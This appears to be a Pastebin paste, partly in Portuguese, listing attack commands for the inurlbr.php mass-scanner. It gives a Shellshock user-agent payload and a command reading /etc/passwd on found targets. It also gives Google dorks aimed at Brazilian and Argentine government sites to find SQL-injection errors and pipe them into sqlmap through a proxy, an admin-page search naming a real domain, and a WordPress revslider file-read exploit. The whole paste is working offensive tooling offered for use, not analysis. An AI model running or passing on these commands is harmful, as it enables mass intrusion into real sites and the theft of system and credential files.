Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [+] Shellshock:
- set user-agent exploit;
- '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;{id}; echo END_CMD:;"'
- - EXECUÇÃO + VALIDAÇÃO INTERNA:
- php inurlbr.php -o SHELLSHOCK_vull.txt -s vull.txt --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;{id}; echo END_CMD:;"' -t 2 -a 99887766555
- - EXECUÇÃO + XPL PRIV8:
- php inurlbr.php -o testarSHELLSHOCK.txt -s teste.txt --command-all 'php shellshock.php -t "_TARGETFULL_" -c "cat /etc/passwd"'
- [+] FIND PAGE:
- DORK: inurl:"/admin/index.php"
- php inurlbr.php --target 'www.geovisite.com' -s testes.txt -o url-list/adminpage.inurl -t 5
- [+] SCAN ERROS SQLI
- DORK: (site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"
- php inurlbr.php --dork '(site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"' -s testes.txt --exploit-get "?'´0x27"
- [+] SCAN ERROS SQLI + sqlmap
- DORK: (site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"
- php inurlbr.php --dork '(site:gov.br | site:gov.ar | site:org.br) & inurl:(id|new|noticia) & "SQL syntax;"' -s testes.txt --exploit-get "?'´0x27" --command-all '../../sqlmap/./sqlmap.py -u "_TARGETFULL_" --dbs --proxy "http://localhost:8118"'
- [+] SCAN VULNS CMS WORDPRESS
- DORK: inurl:/admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
- php inurlbr.php --dork 'inurl:/admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s teste.txt --command-all 'php exploitWPLFD.php _TARGET_'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement